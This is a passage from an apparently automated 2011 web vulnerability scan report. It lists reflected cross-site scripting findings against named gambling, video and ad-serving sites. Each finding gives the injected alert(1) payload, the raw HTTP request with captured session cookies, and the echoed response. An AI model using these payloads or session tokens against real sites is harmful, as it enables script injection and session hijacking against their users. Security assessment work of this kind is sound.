<iframe src="./mainpage.asp?rn=19232879864&f18d6"><script>alert(1)</script>b33b92fe45=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.68. http://www.bet365.com/home/default.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/home/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936ef"><script>alert(1)</script>c2361b79bb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/default.asp?936ef"><script>alert(1)</script>c2361b79bb1=1 HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:52 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 45588
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private


<html>

<link rel="shortcut icon" href="http://www.bet365.com/favicons/bet365-favicon.ico" type="image/x-icon">
<head>
<META http-equiv="Content-Type" content="text/html;
...[SNIP]...
<iframe src="./mainpage.asp?rn=19545540740&936ef"><script>alert(1)</script>c2361b79bb1=1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" style="width:986px;height:1000px;" name="main" id="main">
...[SNIP]...

3.69. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4702d"><script>alert(1)</script>be96a23f3a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fplayer/?4702d"><script>alert(1)</script>be96a23f3a3=1 HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.70. http://www.okscratchcards.com/ [70343%27-alert(1)-%2789d3bb43680 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.okscratchcards.com
Path:	/

Issue detail

The value of the 70343%27-alert(1)-%2789d3bb43680 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dd46'-alert(1)-'c702a91d7ec was submitted in the 70343%27-alert(1)-%2789d3bb43680 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?70343%27-alert(1)-%2789d3bb43680=14dd46'-alert(1)-'c702a91d7ec HTTP/1.1
Host: www.okscratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: __utma=80613129.1362500150.1305546536.1305546536.1305546536.1; __utmb=80613129.6.10.1305546536; __utmc=80613129; __utmz=80613129.1305546536.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; CSI_20=EncryptedUniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; UniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE; LanguageCode=ENG; CountryCode=US; CSITemp=20

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13008
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 12:42:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
I_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&70343'-alert(1)-'89d3bb43680=14dd46'-alert(1)-'c702a91d7ec','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.71. http://www.okscratchcards.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.okscratchcards.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9e66'-alert(1)-'3904ab68a42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?c9e66'-alert(1)-'3904ab68a42=1 HTTP/1.1
Host: www.okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12560
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 11:37:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c9e66'-alert(1)-'3904ab68a42=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.72. http://www.okscratchcards.com/terms-and-conditions.aspx [& parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.okscratchcards.com
Path:	/terms-and-conditions.aspx

Issue detail

The value of the & request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7e02'-alert(1)-'f58d0b85f2e was submitted in the & parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /terms-and-conditions.aspx?&f7e02'-alert(1)-'f58d0b85f2e HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22824

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>

<title>

Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets – okscratc
...[SNIP]...

var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&&f7e02'-alert(1)-'f58d0b85f2e','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.73. http://www.okscratchcards.com/terms-and-conditions.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.okscratchcards.com
Path:	/terms-and-conditions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c311e'-alert(1)-'d8afc8da06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /terms-and-conditions.aspx?c311e'-alert(1)-'d8afc8da06f=1 HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22827

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>

<title>

Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets – okscratc
...[SNIP]...
;
var cookie_id=getCookie("CSI_20");
window.open('https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CUR=GBP&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI='+cookie_id+'&c311e'-alert(1)-'d8afc8da06f=1','','resizable=yes,left=0,top=0,width=' + (window.screen.width-8) + ',height=' + (window.screen.height - (window.screen.height>
...[SNIP]...

3.74. http://www.primescratchcards.com/index.asp [curr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35af5'%3balert(1)//d13433ff10e was submitted in the curr parameter. This input was echoed as 35af5';alert(1)//d13433ff10e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.asp?curr=USD35af5'%3balert(1)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29900
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD35af5';alert(1)//d13433ff10e&AR=130137&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no
...[SNIP]...

3.75. http://www.primescratchcards.com/index.asp [curr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/index.asp

Issue detail

The value of the curr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13cad"%3balert(1)//2102d64af9 was submitted in the curr parameter. This input was echoed as 13cad";alert(1)//2102d64af9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.asp?curr=USD13cad"%3balert(1)//2102d64af9&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29898
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
document.trucksys.submit();
DownloadCount();
}

function doflashSidebar_ByLng()
{
var flashGettingStarted = new FlashObject("http://www.primescratchcards.com/images/sidebar_flash/ENG_USD13cad";alert(1)//2102d64af9.swf", "movie", "197", "134", "6", "");
flashGettingStarted.addParam("quality", "best");
flashGettingStarted.addParam("allowScriptAccess", "always");
flashGettingStarted.addParam("wmode", "tra
...[SNIP]...

3.76. http://ad.yieldmanager.com/imp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45128'-alert(1)-'006f93246b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:34 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0243.rm.bf1
Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui!2'V=!!!!#=!o!t"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: vuday1=JOU8[NDf0(/hP#[; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$(#H!#yJY!$fh[!2'V=!%hKg!!!!$!?5%!$Tey-!wVd.!'Hct!$gSu!'x'(~~~~~=!o!t=(*f'!!.vL"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=OrgU(-xY.<O0,nW; path=/; expires=Mon, 16-May-2011 13:52:34 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:34 GMT
Pragma: no-cache
Content-Length: 3662
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

//raw JavaScript
document.write('<scr'+'ipt>\nvar gEbBAd = new Object();\ngEbBAd.AClickUrl = "http://t.mookie1.com/t/v1/clk?migAgencyId=66&migSource=mmind&migTrackDataExt=[%tp_AdID%];[%tp_Placement
...[SNIP]...
asci_publiid = '1709175';
var asci_sectid = '1703625';
var asci_advliid = '3056520';
var asci_cid = '9245050';
var asci_p = '200';
var asci_refurl = escape('http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b');
if ( asci_refurl.length >
...[SNIP]...

3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/sportsbook/registrationform.aspx

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0eb"><script>alert(1)</script>69648c939d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sportsbook/registrationform.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)</script>69648c939d3
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response (redirected)

3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00d9"-alert(1)-"58ee19908e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMc00d9"-alert(1)-"58ee19908e3; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: BO=FMc00d9"-alert(1)-"58ee19908e3; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc00d9"-alert(1)-"58ee19908e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd02"-alert(1)-"7f6a71d7a39 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdcd02"-alert(1)-"7f6a71d7a39";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/ContactUsMail.aspx

Issue detail

